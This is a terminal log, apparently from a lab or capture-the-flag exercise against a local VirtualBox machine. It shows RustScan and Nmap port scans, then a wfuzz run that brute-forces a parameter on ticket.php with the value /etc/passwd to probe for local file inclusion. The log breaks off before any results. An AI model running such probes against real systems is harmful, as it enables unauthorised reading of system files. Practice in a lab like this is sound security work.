root@LAPTOP-O235O5EH [~] ➜ rustscan -a 192.168.100.76 [15:16:05] .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- RustScan: Exploring the digital landscape, one IP at a time.
[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.100.76:22 Open 192.168.100.76:80 [~] Starting Script(s) [~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 15:17 CST Initiating ARP Ping Scan at 15:17 Scanning 192.168.100.76 [1 port] Completed ARP Ping Scan at 15:17, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:17 Completed Parallel DNS resolution of 1 host. at 15:17, 6.52s elapsed DNS resolution of 1 IPs took 6.52s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0] Initiating SYN Stealth Scan at 15:17 Scanning 192.168.100.76 [2 ports] Discovered open port 80/tcp on 192.168.100.76 Discovered open port 22/tcp on 192.168.100.76 Completed SYN Stealth Scan at 15:17, 0.01s elapsed (2 total ports) Nmap scan report for 192.168.100.76 Host is up, received arp-response (0.00054s latency). Scanned at 2026-01-19 15:17:37 CST for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:E5:04:39 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 6.65 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
root@LAPTOP-O235O5EH [~] ➜ wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://192.168.100.76/ticket.php\?FUZZ\=/etc/passwd --hh 204 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://192.168.100.76/ticket.php?FUZZ=/etc/passwd Total requests: 56162
===================================================================== ID Response Lines Word Chars Payload =====================================================================